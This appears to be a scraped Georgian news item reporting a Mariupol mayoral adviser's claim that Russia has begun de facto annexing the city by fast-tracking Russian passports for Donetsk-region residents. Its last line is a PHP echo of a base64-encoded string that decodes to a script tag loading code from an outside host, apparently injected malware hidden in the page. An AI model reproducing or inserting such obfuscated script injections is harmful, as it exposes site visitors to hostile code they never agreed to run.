gorgia
ავერსი jaluzi
მარიუპოლის მერის მრჩეველი, პეტრო ანდრიუშჩენკო აცხადებს, რომ რუსეთმა საპორტო ქალაქის დე ფაქტო ანექსია დაიწყო. კერძოდ, ანდრიუშჩენკოს თქმით, დღეიდან მარიუპოლის მაცხოვრებლებს შეუძლიათ რუსეთის მოქალაქეობის მიღება ე.წ. შუალედური მოქალაქეობის მიღების გარეშე.
 
მისი თქმით, თუ ადრე  ოკუპირებული ტერიტორიების მცხოვრებლები რუსეთის მოქალაქეობის სწრაფად მიღებას მხოლოდ იმ შემთხვევაში ახერხებდნენ, თუ მათ ჰქონდათ დროებით ოკუპირებული დონეცკის თვითგამოცხადებული რესპუბლიკის პასპორტი, დღეიდან დონეცკის ოლქში დარეგისტრირებულ ყველა მოქალაქეს, დაჩქარებული წესით რუსული პასპორტის აღება შეუძლია.
 
შეგახსენებთ, პუტინმა ხელი მოაწერა განკარგულებას ხერსონისა და ზაპოროჟიეს ოლქების მცხოვრებთათვის, რუსეთის მოქალაქეობის მიღების გამარტივებაზე.
670
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");